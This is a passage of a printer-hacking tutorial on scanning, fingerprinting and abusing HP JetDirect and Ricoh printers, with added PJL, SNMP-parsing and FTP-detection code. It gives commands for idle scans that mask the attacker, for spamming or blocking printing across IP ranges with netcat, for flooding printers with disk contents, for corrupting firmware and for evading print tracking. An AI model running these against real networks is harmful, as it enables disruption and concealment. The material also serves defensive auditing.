Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 15:12 EDT
Interesting ports on igprinter (192.168.1.93):
(The 1656 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        HP JetDirect ftpd
23/tcp   open  telnet?
80/tcp   open  http       HP Jetdirect httpd
280/tcp  open  http       HP Jetdirect httpd
515/tcp  open  sdmsvc     LANDesk Software Distribution (sdmsvc.exe)
631/tcp  open  http       HP Jetdirect httpd
9100/tcp open  jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP LaserJet printer/print server

Nmap finished: 1 IP address (1 host up) scanned in 120.963 seconds
Irongeek:~#
There's one problem with the simple command shown above. If you are using a version of Nmap before 3.90, on
some network printers it will create garbage print jobs with text like:
GET / HTTP/1.0
OPTIONS / HTTP/1.0
OPTIONS / RTSP/1.0
on each of the sheets printed, wasting a lot of paper. This happens because when Nmap does version detection on
port 9100/tcp it sends some of the probe requests from the nmap-service-probes file to figure out what service is
running there. Since the JetDirect box does not understand what it's being sent it just prints out the probes and you
wind up with a bunch of garbage printed out. The easiest way to fix this is to upgrade to Nmap 3.90 or later, which
excludes 9100/tcp from version probing by default (the exclusion is lifted again if you pass --allports, so don't).
Barring that, a better and faster workaround is to only probe the common network printer ports other than 9100
(Note: you may want to leave off -T insane for stealth/bandwidth reasons):
nmap -A -p 21,23,80,280,515,631 192.168.1.* -T insane
or not use the -A option at all (which, among other things, turns on -sV and -O together) and just use -O to detect the
OS that's running, without sending probes to the ports to find out what service versions are running.
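The paper-wasting probes above and the LCD trick from Stupid Printer Tricks are two sides of the same thing: whatever lands on 9100/tcp is either a print job or, if it starts with PJL, a command. A scanner that speaks PJL can identify a printer without printing anything. The following is an added example, not code from the original article or from Nmap: it builds the @PJL RDYMSG job used above, sends @PJL INFO ID in place of HTTP/RTSP probes, and parses the reply. The Universal Exit Language sequence (ESC%-12345X) and the INFO ID reply format (command echoed, identifier in quotes, then a form feed) are HP's documented PJL behaviour; the function names, the fake printer and the sample reply bytes are this example's own.

```python
"""Talk PJL to a printer on 9100/tcp without wasting paper.

Added example, not code from the original article.  Setting the control-panel
message (@PJL RDYMSG) and identifying a device (@PJL INFO ID) both ride the
same raw port that a print job would, so the job is wrapped in UEL to switch
the printer into PJL mode instead of printing the bytes.
"""
import socket
import threading
from typing import Optional, Tuple

UEL = b"\x1b%-12345X"   # Universal Exit Language: leave the current PDL, enter PJL
FORM_FEED = b"\x0c"     # terminates every PJL INFO reply


def pjl_display_job(message: str) -> bytes:
    """Bytes that set the ready message.  PJL strings cannot contain quotes,
    and non-ASCII characters are dropped since the panel cannot show them."""
    safe = message.replace('"', "").encode("ascii", "ignore")
    return UEL + b'@PJL RDYMSG DISPLAY="' + safe + b'"\r\n' + UEL


def pjl_info_id_job() -> bytes:
    """Bytes that ask the printer to identify itself; nothing gets printed."""
    return UEL + b"@PJL INFO ID\r\n" + UEL


def parse_info_id(reply: bytes) -> Optional[str]:
    """Extract the quoted identifier from an INFO ID reply such as
    b'@PJL INFO ID\\r\\n"HP LaserJet 4100 Series"\\r\\n\\x0c'."""
    text = reply.decode("latin-1")
    if "@PJL INFO ID" not in text:
        return None
    for line in text.splitlines():
        line = line.strip().strip("\x0c").strip()
        if len(line) >= 2 and line[0] == '"' and line[-1] == '"':
            return line[1:-1]
    return None


def query_printer(host: str, port: int = 9100, timeout: float = 5.0) -> Optional[str]:
    """Send INFO ID and return the identifier.  Returns None for a device that
    does not speak PJL; such a device may print the one-line query as text,
    which is still far less paper than Nmap's probe set."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(pjl_info_id_job())
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
                if FORM_FEED in data:
                    break
        except socket.timeout:
            pass
    return parse_info_id(b"".join(chunks))


def set_display(host: str, message: str, port: int = 9100, timeout: float = 5.0) -> None:
    """Change the LCD ready message; there is no reply to read."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(pjl_display_job(message))


def fake_printer(identifier: str) -> Tuple[int, threading.Thread]:
    """Local stand-in for a PJL printer so the client can be exercised offline:
    accepts one connection and answers it with an INFO ID reply."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve() -> None:
        conn, _ = srv.accept()
        with conn, srv:
            conn.recv(4096)
            conn.sendall(b'@PJL INFO ID\r\n"' + identifier.encode() + b'"\r\n' + FORM_FEED)

    thread = threading.Thread(target=serve, daemon=True)
    thread.start()
    return srv.getsockname()[1], thread


if __name__ == "__main__":
    port, thread = fake_printer("HP LaserJet 4100 Series")
    print(query_printer("127.0.0.1", port))
    thread.join()
```

Point `query_printer()` at each host Nmap reports with 9100/tcp open and you get the model string with no paper used; `set_display()` is the netcat one-liner from earlier with the UEL wrapper added, which some devices need before they will accept PJL.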
While we are at it, it might be interesting to run a UDP scan on the JetDirect box as well.
Irongeek:~# nmap -sU 192.168.1.*
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-11 06:21 EDT
Interesting ports on 192.168.1.93:
(The 1474 ports scanned but not shown below are in state: closed)
PORT      STATE         SERVICE
137/udp   open|filtered netbios-ns
161/udp   open|filtered snmp
427/udp   open|filtered svrloc
32768/udp open|filtered omad
MAC Address: 00:60:B0:6D:47:C6 (Hewlett-packard CO.)

Nmap finished: 1 IP address (1 host up) scanned in 86.238 seconds
Irongeek:~#
As you can see we found quite a few ports to look into. I'll go over some of the things you can do with them in a
bit. By the way, you may notice the NMB port 137/udp is open, which means you may be able to find printers on the
LAN via the NetBIOS name service.
By the way, to find Ricoh Savins on the network you could use an Nmap command something like the following:
Irongeek:/# nmap -A 192.168.1.3 -T insane
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-09 23:49 EDT
Interesting ports on 192.168.1.3:
(The 1656 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp
23/tcp   open  telnet?
80/tcp   open  http?
514/tcp  open  shell?
515/tcp  open  printer    lpd (error: Illegal service request)
631/tcp  open  ipp?
9100/tcp open  jetdirect?
5 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
...Omitted for security and space reasons...
MAC Address: 00:00:74:80:7C:B8 (Ricoh Company)
Device type: general purpose
Running: NetBSD
OS details: NetBSD 1.3I through 1.6
Uptime 6.506 days (since Sat Sep 3 11:42:37 2005)

Nmap finished: 1 IP address (1 host up) scanned in 94.690 seconds
Irongeek:/#
Notice that the Ricoh Savins have a lot of the same ports open as the HP JetDirects, but that the OS is
detected as NetBSD (it will even run on your toaster).
Since many network printers respond to SNMP, another great way to find them is to use an SNMP service scanning
tool. Ricoh puts out a good tool for finding and configuring many network printers called SmartDeviceMonitor.
SmartDeviceMonitor seems to miss some network printers that aren't Savins, but if you use Ricoh Savin Aficio
printers on your network it's a great tool for locating and polling them.
http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=Device%20Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA
Foundstone's SNScan is another good choice:
http://www.foundstone.com/resources/proddesc/snscan.htm
or Softperfect's NetScan if you turn on the SNMP search options:
http://www.softperfect.com/products/networkscanner/
A third way you could find network printers (if you are on the same subnet) is to use Nmap or Cain to do
an ARP sweep and look for any boxes with a MAC address belonging to Hewlett Packard, Ricoh or another printer
vendor. These are likely network printers.
Finding Printers with Google
Sometimes for convenience admins will put links to their printers' web interfaces on an Intranet site so they can
easily admin them or pull off stored documents. Well, sometimes an Intranet is not really just an Intranet but is
accessible via the Internet. Google is a great way to find these printers. Here are a few search strings that may be of
interest:
Ricoh Savins (Since these printers frequently store documents where they can be downloaded this can be a real killer for
security)
intitle:"web image monitor"
"/web/user/en/websys/webArch/mainFrame.cgi"
inurl:"/en/sts_index.cgi"
HP Jetdirects (Varies greatly from model to model)
inurl:hp/device/this.LCDispatcher
CUPS Connected Printers
inurl:":631/printers" -php -demo
Try combining the above with the Google "site:" parameter to restrict the search to just certain organizations.
For more information on Google Hacking visit http://johnny.ihackstuff.com and search their database of useful
Google search strings for "Printers". I obtained some of the above search strings from Johnny's site.
Finding info about the printer using SNMP tools
Using the tools from http://net-snmp.sourceforge.net on a Linux box can yield a great deal of information about
a network, assuming no firewalls are blocking the SNMP port (161/udp). The greatly truncated output below should
give you some idea as to the kind of information you can get using snmpwalk, including other hosts on the same
network, their IPs and MAC addresses, and the features of the printer along with its firmware revision. If you are
using a Debian based distribution of Linux try the "apt-get install snmp" command to get these tools.
root@Cthulhu:~# snmpwalk -v 1 -c public 192.168.1.2
SNMPv2-MIB::sysDescr.0 = STRING: HP ETHERNET MULTI-ENVIRONMENT,ROM H_06_01,JETDIRECT EX,JD34,EEPROM H.08.49
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.11.2.3.9.1
SNMPv2-MIB::sysUpTime.0 = Timeticks: (1358074910) 157 days, 4:25:49.10
SNMPv2-MIB::sysContact.0 = STRING:
SNMPv2-MIB::sysName.0 = STRING: NPI6D47C6
SNMPv2-MIB::sysLocation.0 = STRING:
SNMPv2-MIB::sysServices.0 = INTEGER: 64
IF-MIB::ifNumber.0 = INTEGER: 1
IF-MIB::ifIndex.1 = INTEGER: 1
IF-MIB::ifDescr.1 = STRING: HP ETHERNET MULTI-ENVIRONMENT,ROM H_06_01,JETDIRECT EX,JD34,EEPROM H.08.49
IF-MIB::ifType.1 = INTEGER: ethernetCsmacd(6)
...Omitted for security and space reasons...
IF-MIB::ifOutQLen.1 = Gauge32: 0
IF-MIB::ifSpecific.1 = OID: SNMPv2-SMI::zeroDotZero.0
RFC1213-MIB::atIfIndex.1.1.192.168.19.16 = INTEGER: 1
...Omitted for security and space reasons...
RFC1213-MIB::atIfIndex.1.1.192.168.31.254 = INTEGER: 1
RFC1213-MIB::atIfIndex.1.1.24.0.1.60 = INTEGER: 1
RFC1213-MIB::atPhysAddress.1.1.192.168.19.16 = Hex-STRING: 00 0A 95 A6 6C 00
...Omitted for security and space reasons...
RFC1213-MIB::atPhysAddress.1.1.192.168.31.254 = Hex-STRING: 00 0F 34 E8 DC 38
RFC1213-MIB::atPhysAddress.1.1.24.0.1.60 = Hex-STRING: 01 00 5E 00 01 3C
RFC1213-MIB::atNetAddress.1.1.192.168.19.16 = Network Address: 95:A0:13:10
...Omitted for security and space reasons...
RFC1213-MIB::atNetAddress.1.1.192.168.31.254 = Network Address: 95:A0:1F:FE
RFC1213-MIB::atNetAddress.1.1.24.0.1.60 = Network Address: E0:00:01:3C
IP-MIB::ipForwarding.0 = INTEGER: notForwarding(2)
...Omitted for security and space reasons...
IP-MIB::ipAdEntAddr.192.168.1.2 = IpAddress: 192.168.1.2
...Omitted for security and space reasons...
IP-MIB::ipNetToMediaIfIndex.1.192.168.19.16 = INTEGER: 1
...Omitted for security and space reasons...
IP-MIB::ipNetToMediaIfIndex.1.192.168.31.254 = INTEGER: 1
IP-MIB::ipNetToMediaIfIndex.1.24.0.1.60 = INTEGER: 1
IP-MIB::ipNetToMediaPhysAddress.1.192.168.19.16 = STRING: 0:a:95:a6:6c:0
...Omitted for security and space reasons...
IP-MIB::ipNetToMediaPhysAddress.1.192.168.31.254 = STRING: 0:f:34:e8:dc:38
...Omitted for security and space reasons...
IP-MIB::ipNetToMediaNetAddress.1.192.168.31.254 = IpAddress: 192.168.31.254
...Omitted for security and space reasons...
IP-MIB::ipNetToMediaType.1.192.168.31.254 = INTEGER: dynamic(3)
IP-MIB::ipNetToMediaType.1.24.0.1.60 = INTEGER: dynamic(3)
IP-MIB::ipRoutingDiscards.0 = Counter32: 2801
...Omitted for security and space reasons...
IP-MIB::icmpOutAddrMaskReps.0 = Counter32: 0
TCP-MIB::tcpRtoAlgorithm.0 = INTEGER: vanj(4)
TCP-MIB::tcpRtoMin.0 = INTEGER: 10 milliseconds
TCP-MIB::tcpRtoMax.0 = INTEGER: 120000 milliseconds
...Omitted for security and space reasons...
TCP-MIB::tcpRetransSegs.0 = Counter32: 20
TCP-MIB::tcpConnState.192.168.1.2.21.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnLocalAddress.192.168.1.2.21.0.0.0.0.0 = IpAddress: 192.168.1.2
TCP-MIB::tcpConnLocalPort.192.168.1.2.21.0.0.0.0.0 = INTEGER: 21
TCP-MIB::tcpConnRemAddress.192.168.1.2.21.0.0.0.0.0 = IpAddress: 0.0.0.0
TCP-MIB::tcpConnRemPort.192.168.1.2.21.0.0.0.0.0 = INTEGER: 0
TCP-MIB::tcpInErrs.0 = Counter32: 0
TCP-MIB::tcpOutRsts.0 = Counter32: 17832
UDP-MIB::udpInDatagrams.0 = Counter32: 8374653
UDP-MIB::udpNoPorts.0 = Counter32: 8135924
UDP-MIB::udpInErrors.0 = Counter32: 22054
UDP-MIB::udpOutDatagrams.0 = Counter32: 363574
UDP-MIB::udpLocalAddress.0.0.0.0.68 = IpAddress: 0.0.0.0
UDP-MIB::udpLocalPort.0.0.0.0.68 = INTEGER: 68
UDP-MIB::udpLocalAddress.192.168.1.2.137 = IpAddress: 192.168.1.2
The above command works well on Jetdirects, Ricoh Savins and other common network printers that support
SNMP. If you don't know the proper SNMP community name, a quick sniff of the network with Ettercap or Dsniff
should reveal it to you if the admin is using SNMP version 1 or 2. Most times the community name will just be
the default "public".
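To make the audit point concrete, here is an added example (not part of the original article and not one of the net-snmp tools) that parses snmpwalk output of the form shown above and summarizes what anyone who knows the read community learns from the printer: its identity strings, the ARP neighbors it has seen, and the sockets it is listening on. The sample input is constructed to mirror the listing above, and the function names are mine.

```python
import re

# Constructed sample, modelled on the snmpwalk listing above (not a live capture).
SAMPLE_WALK = """\
SNMPv2-MIB::sysDescr.0 = STRING: HP ETHERNET MULTI-ENVIRONMENT,ROM H_06_01,JETDIRECT EX,JD34,EEPROM H.08.49
SNMPv2-MIB::sysName.0 = STRING: NPI6D47C6
SNMPv2-MIB::sysContact.0 = STRING:
IP-MIB::ipNetToMediaPhysAddress.1.192.168.19.16 = STRING: 0:a:95:a6:6c:0
IP-MIB::ipNetToMediaPhysAddress.1.192.168.31.254 = STRING: 0:f:34:e8:dc:38
IP-MIB::ipNetToMediaType.1.192.168.31.254 = INTEGER: dynamic(3)
TCP-MIB::tcpConnState.192.168.1.2.21.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.192.168.1.2.9100.0.0.0.0.0 = INTEGER: listen(2)
UDP-MIB::udpLocalPort.0.0.0.0.68 = INTEGER: 68
UDP-MIB::udpLocalPort.192.168.1.2.137 = INTEGER: 137
"""

# One snmpwalk line: MIB::object.index = Type: value   (value may be empty)
LINE_RE = re.compile(
    r"^(?P<mib>[\w-]+)::(?P<obj>\w+)\.(?P<idx>[\w.]+) = (?P<type>[A-Za-z][\w -]*?): ?(?P<val>.*)$"
)


def parse_snmpwalk(text):
    """Return [(object, index, type, value), ...], skipping lines that do not parse."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append((m["obj"], m["idx"], m["type"], m["val"].strip()))
    return records


def normalise_mac(raw):
    """Turn '0:a:95:a6:6c:0' or '00 0A 95 A6 6C 00' into '00:0a:95:a6:6c:00'."""
    parts = re.split(r"[:\s]+", raw.strip())
    return ":".join(f"{int(p, 16):02x}" for p in parts if p)


def summarize_exposure(records):
    """Pull out the fields an auditor cares about: who the box is, what it has
    talked to (ARP cache), and which ports it listens on."""
    summary = {"identity": {}, "neighbors": {}, "tcp_listeners": [], "udp_listeners": []}
    for obj, idx, _typ, val in records:
        if obj in ("sysDescr", "sysName", "sysContact", "sysLocation"):
            summary["identity"][obj] = val
        elif obj in ("ipNetToMediaPhysAddress", "atPhysAddress"):
            # index ends in the neighbor's IPv4 address for both MIB tables
            ip = ".".join(idx.split(".")[-4:])
            summary["neighbors"][ip] = normalise_mac(val)
        elif obj == "tcpConnState" and val.startswith("listen"):
            # index layout: localIP(4) . localPort . remoteIP(4) . remotePort
            summary["tcp_listeners"].append(int(idx.split(".")[4]))
        elif obj == "udpLocalPort":
            summary["udp_listeners"].append(int(val))
    return summary


if __name__ == "__main__":
    print(summarize_exposure(parse_snmpwalk(SAMPLE_WALK)))
```

Run against a real walk (snmpwalk -v 1 -c public ... > walk.txt) the same functions tell you at a glance whether the printer is handing out a map of your LAN, which is the argument for changing the community name and limiting who can reach 161/udp.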
Using a JetDirect box as an Nmap Idlescan Zombie
While I'm on the topic of Nmap and JetDirect boxes, they make great bouncers for stealth Idle scans (also known
as Zombie scans) since their IPIDs are incremental. Basically what happens is the Nmap scan is bounced off of the
JetDirect box and any logs on the target will show the IP of the JetDirect box as being the attacker. There are a few
problems with these kinds of scans, the biggest being that they are VERY slow. For more details on Idle scans see
the following URL:
http://www.insecure.org/nmap/idlescan.html
and the Nmap MAN page:
-sI <zombie host[:probeport]>
Idlescan: This advanced scan method allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable "IP fragmentation ID" sequence generation on the zombie host to glean information about the open ports on the target. IDS systems will display the scan as coming from the zombie machine you specify (which must be up and meet certain criteria). I wrote an informal paper about this technique at http://www.insecure.org/nmap/idlescan.html .

Besides being extraordinarily stealthy (due to its blind nature), this scan type permits mapping out IP-based trust relationships between machines. The port listing shows open ports from the perspective of the zombie host. So you can try scanning a target using various zombies that you think might be trusted (via router/packet filter rules). Obviously this is crucial information when prioritizing attack targets. Otherwise, you penetration testers might have to expend considerable resources "owning" an intermediate system, only to find out that its IP isn't even trusted by the target host/network you are ultimately after.

You can add a colon followed by a port number if you wish to probe a particular port on the zombie host for IPID changes. Otherwise Nmap will use the port it uses by default for "tcp pings".
Here is an example of Nmap being run using a JetDirect box as a bouncer. I've used the -P0 option so that the
host running Nmap does not ping the target first, which would lessen the stealth value by giving away the scanner's true IP.
Irongeek:~# nmap -P0 -sI 192.168.1.93 Irongeek.irongeek.com
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 17:22 EDT
Idlescan using zombie 192.168.1.93 (192.168.1.93:80); Class: Incremental
Interesting ports on 192.168.1.5:
(The 1654 ports scanned but not shown below are in state: closed|filtered)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
111/tcp open  rpcbind
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds
587/tcp open  submission

Nmap finished: 1 IP address (1 host up) scanned in 35.262 seconds
Irongeek:~#
Now, if 192.168.1.5 looks at its logs it will appear that 192.168.1.93 (the JetDirect box) was doing the scan.
Sneaky!
Setting up a direct IP printer in Windows and Linux
Setting up a direct IP printer can be useful from time to time; here are a few reasons why you might want to set
one up:
1. Your main print server is unreliable.
2. Sometimes cutting out the middle man makes a print job work when normally it would not. Some PDFs used to give
me fits when I used a Windows 2000 server to host print shares, but printing directly to the IP printer worked like a
charm.
3. To bypass access rights to a printer or to get around print tracking software like Pharos Uniprint or Equitrac.
Rather than waste space on how to set up direct IP printing in Windows I'll point you to Microsoft's howto:
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/library/ServerHelp/25468cbe-faab-424c-aae5-ddd333436c0d.mspx
and HP's:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj06391
If you wish to script the installation in Windows check out:
https://engineering.purdue.edu/ECN/Resources/KnowledgeBase/Docs/20040216090320
For you Linux users it's pretty easy to set up a direct IP printer too. Make sure you have CUPS (Common Unix
Printing System) installed (for us Debian folks: apt-get install cupsys). Most Linux distributions have a GUI setup
wizard now, but you can also add a direct IP printer from the shell by using a command like the following:
foomatic-configure -s cups -n My-Remote-JetDirect -c socket://192.168.1.2:9100/
Of course, you will want to change the IP and maybe the name to reflect your network and printer setup. If for
some reason
http://192.168.4.2:631/printer
http://192.168.4.2:631/ipp
Spamming Printers
I'm rather surprised, given the amount of E-mail, Net Message and Fax spam, that no one seems to have tried
Printer Spam. First, the attacker would need to have something to iterate through printers. I wrote a quick tool for
Linux and Windows called IPIterator that does just this:
http://www.irongeek.com/i.php?page=security/ipiterator
The following example assumes that port 9100/tcp is open past the firewall (don't laugh, I've seen it), but with some
modification I'm pretty sure it could be made to work with IPP and FTP enabled printers too. All one has to do is
generate a PostScript or PCL file containing the spam message they want to send. The Windows "Print to
File" option works well for this. In a pinch a plain old text file will also work. Then they can use Netcat and IPIterator
to send the print job to a whole IP range of printers.
Irongeek@Irongeek:~# ./ipiterator 192.168.3.1-5,25,"cat spam.prn|netcat -q 0 ~ip 9100"
cat spam.prn|netcat -q 0 192.168.3.1 9100
Starting thread 1
cat spam.prn|netcat -q 0 192.168.3.2 9100
Starting thread 2
cat spam.prn|netcat -q 0 192.168.3.3 9100
Starting thread 3
cat spam.prn|netcat -q 0 192.168.3.4 9100
Starting thread 4
cat spam.prn|netcat -q 0 192.168.3.5 9100
Starting thread 5
DONE
Irongeek@Irongeek:~#
Evil, I know; maybe I should not have mentioned it as now it may become more common. This facility might also be
legitimately useful for sending out mass messages on a network where you work.
Side note on a Pharos Uniprint vulnerability
While this is not directly related to the article's main topic I thought that some of you would be interested in
knowing about a vulnerability with the Pharos Uniprint system. It looks like Pharos Uniprint saves the last print jobs
sent to a printer into C:\Program Files\Pharos\Temp\PORT*.PRN as a simple PCL print job which is readable by
everyone on the Windows box by default. With a quick NetCat command (seen later in this article in the sniffing and
replay section) or an FTP of the file to a JetDirect box it's easy to see what others have been printing out on that
Windows workstation. Not very secure huh? It seems that Pharos did fix this in later versions, as Edward Burhenn
stated in his email to me:
This was a "bug" in an older version of Pharos for which
a hot fix was released:
The application of Pharos 7.0 Hot Fix 1 ensures that no
more spool file copies will be retained after print jobs for
both Popups and non-Popups printers. Existing copies of
old spool files in the ...\Pharos\Temp folder will need to
be deleted manually.
To avoid any further confusion could you post an update
to the article, perhaps directing folk to the hot fix which
can be downloaded from our website:
http://www.pharos.com/Support/index.html?
Thanks,
Ed
Edward Burhenn
Technical Specialist
DoSing the network or the printer
As should be obvious by now for those that have been paying attention, it's pretty trivial to cause a DoS (Denial
of Service) attack with a JetDirect box that's not password protected. A deviant user could just use the telnet or web
interface to set the IP of the JetDirect to the same IP as the gateway - instant routing confusion. Another option for
network mayhem would be to set the host name of the JetDirect box to that of another box on the network. This
would mess a few things up if the facility uses dynamic DNS for host names. Also notice from the UDP port scan
shown earlier that the JetDirect box is running the NetBIOS naming service, so changing the host name on a Windows
network could cause name resolution problems.
As for DoSing the printer, if someone wanted to be a dick they could just hop onto their *nix box and cat their
hard drive to the printer, causing a print job the size of the local hard drive:
cat /dev/hda|netcat -q 0 192.168.1.2 9100
Much the same thing could be accomplished by FTPing your swap file to a JetDirect box that accepts FTP print
jobs.
Another thing that could be done is to upload a corrupted firmware to the JetDirect box. This can be done by
obtaining the HP Download Manager from:
http://www.hp.com/go/dlm_sw
and then attempting an upgrade of the firmware, but stopping the process halfway through. The JetDirect will be non
responsive until a full firmware is uploaded again. An interesting side note: you can upgrade the firmware on a
JetDirect even if you don't know the JetDirect's system password. Why HP did not require a password for a firmware
update I have no idea; it just seems like common sense that they would. From reading Slobotron's article (linked at
the bottom) it would seem you can also upgrade the firmware with Netcat.
On a lark I decided to test the effects of connecting to port 9100/tcp and holding the connection open using the Telnet
command. I tested it on a Ricoh Savin Aficio 2045e and a JetDirect 300x (J3263A) and the result was that the
connection to port 9100/tcp seems to be single threaded. While I held the Telnet connection to port 9100 no other
print jobs could be sent to the printer! The connection should time out after a while. Imagine if someone used an active
connection on the LAN and a command like:
./ipiterator 192.168.1.*,25,"telnet ~ip 9100"
to knock out printing to a whole LAN! See the section above for more info on IPIterator.
Because of the relatively weak IP stacks in most network printers there are a lot of other little Denial of Service
exploits. I recommend checking out http://www.securityfocus.com/bid/ for more DoS attacks. One of the more
interesting attacks to be found recently (12/19/2006) comes from researcher Joxean Koret. I've got to thank the
Pauldotcom podcast (episode 55) for pointing it out to me. It seems that Mr. Koret found a flaw in some HP
JetDirects that permanently bricks the print server to the point it has to be sent back to HP to be fixed. For those
that don't understand the term "brick", it means that the device has been made inoperable because of bad firmware
or an electrical problem. This is a serious flaw since it effectively turns the JetDirect into a paperweight. In Joxean
Koret's words:
HP FTP Printer Server Denial Of Service
---------------------------------------
Author: Joxean Koret
Date: 2006
Location: Basque Country
Affected Software
-----------------
Vendor: Hewlett Packard
Description: HP Printers FTP Server Denial Of Service
Description
-----------
A problem exists in almost any currently used HP Printer with the FTP
Print Server.
Version 2.4 of the FTP Print Server will crash with only one shot.
Version 2.4.5, which is the latest, will need various shots (the number of
shots needed is currently unknown).
While playing with my own FTP Fuzzer I tried finding flaws in HP's
Printers. After trying with 5 printers I found the problem in all of
these. The problem is a buffer overflow in the LIST and NLST command. In
version 2.4 a single shot sending a LIST command with a long string
(about 256 characters) is sufficient to test the vulnerability.
Take care trying it because two of my printers crashed completely
(you will need to make use of your warranty ;] ). Against 2.4 versions
it can crash the complete printer and it will be unresponsive even after
rebooting it.
In version 2.4.5 (which is the latest) you need to send long shots to
the LIST parameter various times (a single shot will not crash it; the
printer will answer with a "Path too long" message). You will need to
send a LIST command with long strings various times. When trying with
other commands you will see that no problem is raised and the printer
will always be responsive. After a successful attack you may completely
crash your printer (i.e., calling technical support to fix your crashed
printer).
The problem can be easily triggered by using any FTP fuzzing tool. You
can crash your printer in about 10 seconds in a LAN.
The printer models I used in my tests are:
* HP LaserJet 5000 Series (firmware R.25.15 / R.25.47)
* HP LaserJet 5100 Series (firmware V.29.12)
Attached goes POCs for the vulnerabilities.
Workaround
----------
Disable the FTP print server as, surely, you aren't using it.
Disclaimer
----------
The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
Contact
-------
Joxean Koret < joxeankoret [at] yah00 [D0T] es >
--
-----------------------------------
Perhaps, perhaps, one day
the true Zuberoans will rise,
the true Basques,
to kill the foreign tyrants
and to give back to the people the land
that our fathers' fathers left them.
-----------------------------------
It is not yet known which JetDirect print servers are affected by this exploit as few people want to take the
chance of destroying their own. I've mirrored his two proof of concept scripts if anyone would like to test them and
let me know which JetDirects it works on:
jd-dos2.4.5.py
jd-dos2.4.py
MITRE lists this bug as CVE-2006-6742. The buffer overflow in the LIST and NLST commands seems to
overwrite part of the firmware, so my best guess is that cheaper print servers without flash memory like the 170x are
probably safe. From what I'm hearing HP is not taking this threat as seriously as they should, given that someone
could cripple printing for days at a corporation using this exploit and a tool like IPIterator. The only known fix as of
yet is a preventative one, and that is to turn off the JetDirect's FTP service or to block port 21/TCP at the border of
the network the print server is on. If anyone has more information on this flaw please email me. See:
http://www.security.nnov.ru/Gnews955.html for more info on this vulnerability.
By the way, don't be the kind of person that would use one of the above techniques, I only mention them so that
admins know what they need to guard against.
Update 01/20/2007: Looks like HP may have fixed this issue with a newer firmware:
http://www.securitytracker.com/alerts/2007/Jan/1017532.html
Still, if anyone has more information please email me.
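Turning off the FTP print server is the fix, but until that is done on every box an admin can at least watch for the pattern the advisory describes. Here is an added example (mine, not part of the original article or of Koret's advisory) of the detection logic one would run over FTP control-channel commands captured in front of a printer: it flags LIST/NLST commands whose argument is longer than the roughly 256-character trigger quoted above, and distinguishes the single-shot case from the repeated one that 2.4.5 needs. The sample session is constructed, and the function names and threshold constant are my own.

```python
# Argument length past which a directory listing is worth flagging; the advisory
# above puts the single-shot trigger for FTP Print Server 2.4 at about 256 characters.
SUSPECT_ARG_LEN = 255
DIRECTORY_COMMANDS = ("LIST", "NLST")


def parse_ftp_command(line):
    """Split one FTP control-channel line into (COMMAND, argument)."""
    cmd, _, arg = line.rstrip("\r\n").partition(" ")
    return cmd.upper(), arg


def flag_long_listings(lines, limit=SUSPECT_ARG_LEN):
    """Return (line_no, COMMAND, arg_length) for every LIST/NLST whose argument exceeds limit."""
    flagged = []
    for n, line in enumerate(lines, 1):
        cmd, arg = parse_ftp_command(line)
        if cmd in DIRECTORY_COMMANDS and len(arg) > limit:
            flagged.append((n, cmd, len(arg)))
    return flagged


def verdict(lines, limit=SUSPECT_ARG_LEN):
    """'clean' if nothing oversized was seen, 'single-shot' for one hit (enough
    against 2.4), 'repeated' for several (what the advisory says 2.4.5 needs)."""
    count = len(flag_long_listings(lines, limit))
    if count == 0:
        return "clean"
    return "single-shot" if count == 1 else "repeated"


# Constructed client-side control-channel transcript, not captured traffic.
SAMPLE_SESSION = [
    "USER anonymous\r\n",
    "PASS guest@\r\n",
    "CWD /\r\n",
    "LIST\r\n",
    "NLST " + "A" * 40 + "\r\n",
    "LIST " + "A" * 300 + "\r\n",
    "NLST " + "B" * 256 + "\r\n",
    "QUIT\r\n",
]

if __name__ == "__main__":
    for hit in flag_long_listings(SAMPLE_SESSION):
        print("line %d: %s with %d-byte argument" % hit)
    print("verdict:", verdict(SAMPLE_SESSION))
```

The same check drops straight into a Snort/IDS content rule on 21/tcp towards the printer VLAN; the Python is just the logic spelled out so that the threshold and the repeat counting are explicit.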
Changing the LCD display text using HPhack, IGhphack or Hijetter
This is an old hack (1997) and does not accomplish much,
but it is fun! Silicosis of L0pht ([email protected]) wrote the original
exploit code for *nix systems and someone else ported it to
NT/2000/XP based systems. Although it's been out there for a long
time, it still works on every HP printer/JetDirect box I have seen.
What the HP display hack allows you to do is set the text that
displays on the little LCD panel of an HP printer. It accomplishes
this over the network by sending packets to a JetDirect box hooked
to the printer (or built into it).
The first thing you need to do is find out the IP or hostname
